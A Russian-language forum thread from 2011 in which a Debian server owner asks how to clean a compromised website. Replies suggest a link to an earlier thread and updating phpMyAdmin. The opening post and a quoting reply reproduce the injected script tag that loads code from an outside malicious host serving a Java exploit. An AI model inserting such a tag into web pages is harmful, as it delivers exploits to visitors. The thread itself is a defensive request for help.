форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Информационная безопасность (Блокирование спама и вирусов / Linux)
Изначальное сообщение		[ Отслеживать ]

"Как очистить зараженый сайт"	+/–
Сообщение от AnJuVi (ok) on 04-Сен-11, 19:59
Сервер на Debian, подцепил какую-то бяку, она заразила сайт на этом сервере. Подписывает в php файлы, сгенерированные шаблонизатором, строку <script type="text/javascript" src="http://statun.cu.cc/counter.php"></script> В самих шаблонах ее нет, в файлах шаблонизатора тоже. В результате у пользователей, которые заходят на сайт, если антивирус Authentium, Eset, F-Prot, Kaspersky или McAfee, находится Вирус HEUR:Exploit.Script.Generic в объекте [url]http://statscounter.cu.cc/content/pch.php?f=16[/url] (Exploit.Java.CVE-2010-0840.ch) Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит. Где эта гадость может сидеть?
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Как очистить зараженый сайт"	+/–
Сообщение от Аноним (??) on 04-Сен-11, 21:16
>[оверквотинг удален] > Подписывает в php файлы, сгенерированные шаблонизатором, строку > <script type="text/javascript" src="http://statun.cu.cc/counter.php"></script> > В самих шаблонах ее нет, в файлах шаблонизатора тоже. > В результате у пользователей, которые заходят на сайт, если антивирус Authentium, > Eset, F-Prot, Kaspersky или McAfee, находится > Вирус HEUR:Exploit.Script.Generic в объекте [url]http://statscounter.cu.cc/content/pch.php?f=16[/url] > (Exploit.Java.CVE-2010-0840.ch) > Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с > сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит. > Где эта гадость может сидеть? http://www.opennet.me/openforum/vsluhforumID1/92218.html Вы не думаете, что эта проблема может быть "как-то" связана с вашей предыдущей темой?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	3. "Как очистить зараженый сайт"	+/–
	Сообщение от Аноним (??) on 04-Ноя-11, 18:27
	> http://www.opennet.me/openforum/vsluhforumID1/92218.html > Вы не думаете, что эта проблема может быть "как-то" связана с вашей > предыдущей темой? То что там - на обычную работу cron похоже. А вот сайт ему и правда поломали...
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Как очистить зараженый сайт"	+/–
Сообщение от Alex (??) on 19-Сен-11, 21:43
> Где эта гадость может сидеть? Проблема решается обновлением phpMyAdmin.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема